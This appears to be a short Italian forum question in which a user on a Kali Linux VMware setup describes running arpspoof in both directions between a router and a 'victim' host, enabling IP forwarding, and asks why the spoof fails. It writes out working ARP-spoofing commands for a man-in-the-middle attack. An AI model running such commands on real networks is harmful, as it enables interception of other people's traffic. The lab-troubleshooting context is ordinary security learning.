Ho un problema con l'implementazione di questo attacco.
Ho una macchina kali linux su workstation vmware. Il mio router è - 192.168.1.1 L'IP della mia vittima è - 192.168.1.254
arpspoof -i eth0 -t 192.168.1.1 192.168.1.254
arpspoof -i eth0 -t 192.168.1.254 192.168.1.1
Ho cambiato
/proc/sys/net/ipv4/ip_forward to value 1.
E dopo il controllo arp -a sulla macchina vittima l'indirizzo mac del router è sempre lo stesso, e se faccio il ping di un ip anche al mio router, viene richiesto il timeout sul CMD della macchina vittima.